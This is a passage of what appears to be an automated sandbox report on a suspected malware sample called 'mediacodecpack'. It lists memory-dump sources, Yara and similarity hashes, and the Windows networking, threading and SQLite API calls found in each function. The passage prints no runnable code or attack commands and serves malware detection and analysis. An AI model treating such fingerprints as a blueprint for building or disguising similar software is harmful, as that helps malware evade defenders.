                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1856819132-0
                                                                                            • Opcode ID: ce5944701e372a8c20d0d16fd90cedd638cbeb07ca6cdf514eab66bc09ffd07c
                                                                                            • Instruction ID: 1594ef70fa66410880f38bcaac977547a3f7a6b2263c02ff7ed53c007ea2cda1
                                                                                            • Opcode Fuzzy Hash: ce5944701e372a8c20d0d16fd90cedd638cbeb07ca6cdf514eab66bc09ffd07c
                                                                                            • Instruction Fuzzy Hash: 7C118171D00115EBDB119FA4E84C6AEBBBAFF45310F10851AFC55A2360DB758E61CBA1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D4229D
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D422B0
                                                                                            • TlsGetValue.KERNEL32 ref: 02D422E7
                                                                                            • TlsSetValue.KERNEL32(?), ref: 02D42300
                                                                                            • TlsSetValue.KERNEL32(?,?,?), ref: 02D4231C
                                                                                              • Part of subcall function 02D42341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D42350
                                                                                              • Part of subcall function 02D42341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D42360
                                                                                              • Part of subcall function 02D42341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D42370
                                                                                              • Part of subcall function 02D42341: GetLastError.KERNEL32 ref: 02D4237A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 1856819132-0
                                                                                            • Opcode ID: 7d921126e2a9d75025f25b15f448ebcb239e68a08caad48b0f148768edb2a9cf
                                                                                            • Instruction ID: a6e9b7f5040c27428f22f11c0751876175a200d701f345253e9058862b1618ea
                                                                                            • Opcode Fuzzy Hash: 7d921126e2a9d75025f25b15f448ebcb239e68a08caad48b0f148768edb2a9cf
                                                                                            • Instruction Fuzzy Hash: 12115B71D00119EBDB119FA5E8086AEBBBAFF54310F10852AEC04A3320DB758E61CBA1
                                                                                            APIs
                                                                                              • Part of subcall function 02D4A169: __EH_prolog.LIBCMT ref: 02D4A16E
                                                                                            • __CxxThrowException@8.LIBCMT ref: 02D4AD33
                                                                                              • Part of subcall function 02D531CA: RaiseException.KERNEL32(?,?,02D4EB63,?,?,?,?,?,?,?,02D4EB63,?,02D6ECA8,?), ref: 02D5321F
                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02D6FA1C,?,00000001), ref: 02D4AD49
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02D4AD5C
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02D6FA1C,?,00000001), ref: 02D4AD6C
                                                                                            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D4AD7A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                                                            • String ID:
                                                                                            • API String ID: 2725315915-0
                                                                                            • Opcode ID: 39bbc9d416095abb08076f0192613dce5a12549bec926554497685109dae8723
                                                                                            • Instruction ID: e462da127130050dd86e15572bf2136207adf75b7647e279094d38f6381b990c
                                                                                            • Opcode Fuzzy Hash: 39bbc9d416095abb08076f0192613dce5a12549bec926554497685109dae8723
                                                                                            • Instruction Fuzzy Hash: 7301D1B6A80204AFDB009FA4EC8DF8A77ACEB04355B504414F611D6390EBA0EC44CB60
                                                                                            APIs
                                                                                            • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D42432
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D42445
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02D42454
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02D42469
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02D42470
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 747265849-0
                                                                                            • Opcode ID: aee66d3fffd8d4490c13bef9ab54e426df536a32260f4fbb9f345b8a326bd45c
                                                                                            • Instruction ID: 8fc7594c48b5615bf81762a3f05fdee0109d3f22e6210032bc063c9d374fa2fe
                                                                                            • Opcode Fuzzy Hash: aee66d3fffd8d4490c13bef9ab54e426df536a32260f4fbb9f345b8a326bd45c
                                                                                            • Instruction Fuzzy Hash: BDF04472680204BBDB00AAA0ED8DFDA772CFB45711FD04821F605D6280DB61E9A0CAF0
                                                                                            APIs
                                                                                            • InterlockedIncrement.KERNEL32(?), ref: 02D41ED2
                                                                                            • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02D41EEA
                                                                                            • RtlEnterCriticalSection.NTDLL(?), ref: 02D41EF9
                                                                                            • InterlockedExchange.KERNEL32(?,00000001), ref: 02D41F0E
                                                                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 02D41F15
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                                                            • String ID:
                                                                                            • API String ID: 830998967-0
                                                                                            • Opcode ID: 3b9dbc119f52d368ee4cf22b99deb1bb135f69062e0ab0c1a1ff70bec978913a
                                                                                            • Instruction ID: 29f83920eae415b2a2922c83cc2f912f88fee804324526c83781740b3c2568c6
                                                                                            • Opcode Fuzzy Hash: 3b9dbc119f52d368ee4cf22b99deb1bb135f69062e0ab0c1a1ff70bec978913a
                                                                                            • Instruction Fuzzy Hash: F0F01772640605BBDB00AFA1FD88FD6B76CFF15715F900426F60186641DB61E9A5CBF0
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_log
                                                                                            • String ID: ($string or blob too big$|
                                                                                            • API String ID: 632333372-2398534278
                                                                                            • Opcode ID: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                            • Instruction ID: 3c3a64a58f66130c0c9aec06ea77be0954bd7b4098f3428da06b6372deec6608
                                                                                            • Opcode Fuzzy Hash: 03236f3895d5fd10e60d1ff1eefb6ed02231b27a1c47450c0fb49d2dd58edd91
                                                                                            • Instruction Fuzzy Hash: 5DC10CB5A043288FCB66CF28C981789B7BABB59304F1085D9E958A7345C775EF81CF40
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memmove
                                                                                            • String ID: invalid string position$string too long
                                                                                            • API String ID: 4104443479-4289949731
                                                                                            • Opcode ID: 2acceca900b3638cbf87835bea4842379aa24a73124b8b93d92be02f0fcac309
                                                                                            • Instruction ID: c80070f147a7f945aa71bda01eaa3536dbe0c6e523cd6756e158772a65a6598f
                                                                                            • Opcode Fuzzy Hash: 2acceca900b3638cbf87835bea4842379aa24a73124b8b93d92be02f0fcac309
                                                                                            • Instruction Fuzzy Hash: DA41A131700300ABEB349E69DC84E6AF7AAEB41764B40492DE856C7781DF70EC09CBA1
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02D430C3
                                                                                            • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02D43102
                                                                                            • _memcmp.LIBCMT ref: 02D43141
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AddressErrorLastString_memcmp
                                                                                            • String ID: 255.255.255.255
                                                                                            • API String ID: 1618111833-2422070025
                                                                                            • Opcode ID: 3ec036e9fe497feee83c42a190750b6b8b1a23965434b1030f2413228ca42733
                                                                                            • Instruction ID: 945c8923e30f8dd800d032e0fb4a4abc0400deb86efb4ee7e998a3b422a7c322
                                                                                            • Opcode Fuzzy Hash: 3ec036e9fe497feee83c42a190750b6b8b1a23965434b1030f2413228ca42733
                                                                                            • Instruction Fuzzy Hash: A731E4719007049FDB209F68C89476EB7A6EF42354F2085A9E8659B380DF719D41CB90
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$Protect$Query
                                                                                            • String ID: @
                                                                                            • API String ID: 3618607426-2766056989
                                                                                            • Opcode ID: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                            • Instruction ID: 11fd3fd6c91f2e29dbdaed7331fdf7a08ef8f1da01c53322037319a40d79a89e
                                                                                            • Opcode Fuzzy Hash: a11a59528d98c4ff7ad69dfbc7d520f68a8f714e9ef4c31244658d91e7757f1c
                                                                                            • Instruction Fuzzy Hash: 003141B5E15208AFEB14DFA9D48158EFFF5EF99254F10852AE868E3310E371D940CB52
                                                                                            APIs
                                                                                            • sqlite3_malloc.SQLITE3 ref: 60928353
                                                                                              • Part of subcall function 60916FBA: sqlite3_initialize.SQLITE3(60912743,?,?,?,?,?,?,?,?,?,?,?,?,?,?,609129E5), ref: 60916FC4
                                                                                            • sqlite3_realloc.SQLITE3 ref: 609283A0
                                                                                            • sqlite3_free.SQLITE3 ref: 609283B6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_realloc
                                                                                            • String ID: d
                                                                                            • API String ID: 211589378-2564639436
                                                                                            • Opcode ID: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                            • Instruction ID: 0830c2115c9ea807631a831f7f1165b0ee40d8a8a94356aa67113494a68d5982
                                                                                            • Opcode Fuzzy Hash: 4c34ce46e3d0a3d1d3def0d8ad382c8948c40f702370fc4fcdce263753dde11a
                                                                                            • Instruction Fuzzy Hash: 222137B0A04205CFDB14DF59D4C078ABBF6FF69314F158469D8889B309E3B8E841CBA1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D41F5B
                                                                                            • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02D41FC5
                                                                                            • GetLastError.KERNEL32(?,00000000), ref: 02D41FD2
                                                                                              • Part of subcall function 02D41712: __EH_prolog.LIBCMT ref: 02D41717
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$CompletionCreateErrorLastPort
                                                                                            • String ID: iocp
                                                                                            • API String ID: 998023749-976528080
                                                                                            • Opcode ID: 5eaf977fa38e0868680b1111285cb59f9137cc7d158c9d3396b27622619242db
                                                                                            • Instruction ID: 04d8ab521700d09e73c88342a66b66437f233d1f0af1624dcce2fd440191adcc
                                                                                            • Opcode Fuzzy Hash: 5eaf977fa38e0868680b1111285cb59f9137cc7d158c9d3396b27622619242db
                                                                                            • Instruction Fuzzy Hash: 3721A8B1901B449FC720DF6AD50455AFBF8FF94710B108A5FD4A693B90D7B0A944CF91
                                                                                            APIs
                                                                                            • _malloc.LIBCMT ref: 02D527DD
                                                                                              • Part of subcall function 02D51FBC: __FF_MSGBANNER.LIBCMT ref: 02D51FD3
                                                                                              • Part of subcall function 02D51FBC: __NMSG_WRITE.LIBCMT ref: 02D51FDA
                                                                                              • Part of subcall function 02D51FBC: RtlAllocateHeap.NTDLL(00800000,00000000,00000001), ref: 02D51FFF
                                                                                            • std::exception::exception.LIBCMT ref: 02D527FB
                                                                                            • __CxxThrowException@8.LIBCMT ref: 02D52810
                                                                                              • Part of subcall function 02D531CA: RaiseException.KERNEL32(?,?,02D4EB63,?,?,?,?,?,?,?,02D4EB63,?,02D6ECA8,?), ref: 02D5321F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                            • String ID: bad allocation
                                                                                            • API String ID: 3074076210-2104205924
                                                                                            • Opcode ID: 6cb799b5df9782ee2443bbfe18bd4e4ce1edcae06988af8c6b7c8837030be921
                                                                                            • Instruction ID: 4e2ae869dbba8b5ad94139df78305f0f1532182b575f40ec34074acbeb53f851
                                                                                            • Opcode Fuzzy Hash: 6cb799b5df9782ee2443bbfe18bd4e4ce1edcae06988af8c6b7c8837030be921
                                                                                            • Instruction Fuzzy Hash: 9EE0303450022EA7DF01EEA4DD09DAF7B7DEB00355F1045959C1566790EBB1DE48CAA1
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02D437B6
                                                                                            • __localtime64.LIBCMT ref: 02D437C1
                                                                                              • Part of subcall function 02D51610: __gmtime64_s.LIBCMT ref: 02D51623
                                                                                            • std::exception::exception.LIBCMT ref: 02D437D9
                                                                                              • Part of subcall function 02D514E3: std::exception::_Copy_str.LIBCMT ref: 02D514FC
                                                                                              • Part of subcall function 02D4952C: __EH_prolog.LIBCMT ref: 02D49531
                                                                                              • Part of subcall function 02D4952C: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D49540
                                                                                              • Part of subcall function 02D4952C: __CxxThrowException@8.LIBCMT ref: 02D4955F
                                                                                            Strings
                                                                                            • could not convert calendar time to UTC time, xrefs: 02D437CE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                                                            • String ID: could not convert calendar time to UTC time
                                                                                            • API String ID: 1963798777-2088861013
                                                                                            • Opcode ID: 68fa9473a2726aa6cfc16bc728d633138d893851dd962dab4f1a25c227955f11
                                                                                            • Instruction ID: f301c5407fbf81bcb089087a4995aabdb32b527d8f04d7e92735d252db327e3b
                                                                                            • Opcode Fuzzy Hash: 68fa9473a2726aa6cfc16bc728d633138d893851dd962dab4f1a25c227955f11
                                                                                            • Instruction Fuzzy Hash: 80E039B2D001199BCF00EFA4D808BFEBB79EB04300F108599D825A2340DB759A19CEA1
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: _Jv_RegisterClasses$libgcj-11.dll
                                                                                            • API String ID: 1646373207-2713375476
                                                                                            • Opcode ID: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                            • Instruction ID: e6822cb61b404b68644b44a252d8259deade1a358cfa59fcc717d95409d4d83a
                                                                                            • Opcode Fuzzy Hash: 84d528d321f1eea6d8a1b68cb749bb1a2441192a5c5952381cf667fabd413772
                                                                                            • Instruction Fuzzy Hash: 0DE04F7062D30586FB443F794D923297AEB5F72549F00081CD9929B240EBB4D440D753
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AdjustPointer_memmove
                                                                                            • String ID:
                                                                                            • API String ID: 1721217611-0
                                                                                            • Opcode ID: 20a9a6c488b5d0afcaf11be54f154144c4b16a68a1becd0c6b46f9baa4091bf1
                                                                                            • Instruction ID: 3e4e77ef2cefa624aec2568232b439115c1d30b1e28e5bb871769debd386d078
                                                                                            • Opcode Fuzzy Hash: 20a9a6c488b5d0afcaf11be54f154144c4b16a68a1becd0c6b46f9baa4091bf1
                                                                                            • Instruction Fuzzy Hash: 8D418135205362DEEF245B25E960BB633A5EF117A4F28441DED558A7D0EBF1EC80CAA0
                                                                                            APIs
                                                                                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02D44149), ref: 02D503CF
                                                                                              • Part of subcall function 02D43FDC: __EH_prolog.LIBCMT ref: 02D43FE1
                                                                                              • Part of subcall function 02D43FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02D43FF3
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02D503C4
                                                                                            • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02D44149), ref: 02D50410
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02D44149), ref: 02D504E1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandle$Event$CreateH_prolog
                                                                                            • String ID:
                                                                                            • API String ID: 2825413587-0
                                                                                            • Opcode ID: 4b803ab20659b20794ce99e88f55364898e5864720ccb6e974c417112b3c7d25
                                                                                            • Instruction ID: 564a45bcf18461e1f65efd2039e4958d82d76c1c9b08d6ab15ad2b9c236412e4
                                                                                            • Opcode Fuzzy Hash: 4b803ab20659b20794ce99e88f55364898e5864720ccb6e974c417112b3c7d25
                                                                                            • Instruction Fuzzy Hash: A551AC716043598BEF20CF28C88875A77E4FF48329F194628ECA9A7390DB75DC45CB91
                                                                                            APIs
                                                                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02D5E2EC
                                                                                            • __isleadbyte_l.LIBCMT ref: 02D5E31A
                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,00000000,00000000,?,?,?), ref: 02D5E348
                                                                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,00000000,00000000,?,?,?), ref: 02D5E37E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2735668441.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_2d41000_mediacodecpack.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                            • String ID:
                                                                                            • API String ID: 3058430110-0
                                                                                            • Opcode ID: 5ae94d3bba643f390878f5665186af44b0a777199f75c6f696499f637df02684
                                                                                            • Instruction ID: c05b49752829ce4612bd57d820fcd819b3c02e4f206a9431c7402cb0a0357e19
                                                                                            • Opcode Fuzzy Hash: 5ae94d3bba643f390878f5665186af44b0a777199f75c6f696499f637df02684
                                                                                            • Instruction Fuzzy Hash: C031F230605226AFEF21AE74C844BAE7BA6FF41315F058569ECA487390D7B0EE51CB90
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_freesqlite3_mallocsqlite3_value_bytessqlite3_value_text
                                                                                            • String ID:
                                                                                            • API String ID: 1648232842-0
                                                                                            • Opcode ID: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                            • Instruction ID: a01add595a6c287de5924383f0ed77e5cc34082cd65fcd393cbe5beac3228527
                                                                                            • Opcode Fuzzy Hash: 6f401334500cf3ce8937f97dce09bc9131fc1f686c7391f4db805f1c2cabf22c
                                                                                            • Instruction Fuzzy Hash: 4531C0B4A042058FDB04DF29C094B5ABBE2FF98354F1484A9EC498F349D779E846CBA0
                                                                                            APIs
                                                                                            • sqlite3_step.SQLITE3 ref: 609614AB
                                                                                            • sqlite3_reset.SQLITE3 ref: 609614BF
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_enter.SQLITE3 ref: 60941C58
                                                                                              • Part of subcall function 60941C40: sqlite3_mutex_leave.SQLITE3 ref: 60941CBE
                                                                                            • sqlite3_column_int64.SQLITE3 ref: 609614D4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.2737325590.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                            • Associated: 00000003.00000002.2737225350.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737558569.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737726788.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737866796.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737892874.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.2737924115.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_60900000_mediacodecpack.jbxd
                                                                                            Similarity
                                                                                            • API ID: sqlite3_column_int64sqlite3_mutex_entersqlite3_mutex_leavesqlite3_resetsqlite3_step
                                                                                            • String ID:
                                                                                            • API String ID: 3429445273-0
                                                                                            • Opcode ID: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                            • Instruction ID: 62863439de2fabb71fd3664abc4fbfc11ff04353a6e6e3e42574d1c19fb7889d
                                                                                            • Opcode Fuzzy Hash: 44b7ea0f60ccad0bdb665534712f35195a3185c30aa33eaed9220a178cd48643
                                                                                            • Instruction Fuzzy Hash: AE316470A183408BEF15CF69C1C5749FBA6AFA7348F188599DC864F30AD375D884C752
                                                                                            APIs
                                                                                            • htons.WS2_32(?), ref: 02D43DA2
                                                                                              • Part of subcall function 02D43BD3: __EH_prolog.LIBCMT ref: 02D43BD8
                                                                                              • Part of subcall function 02D43BD3: std::bad_exception::bad_exception.LIBCMT ref: 02D43BED
                                                                                            • htonl.WS2_32(00000000), ref: 02D43DB9
                                                                                            • htonl.WS2_32(00000000), ref: 02D43DC0
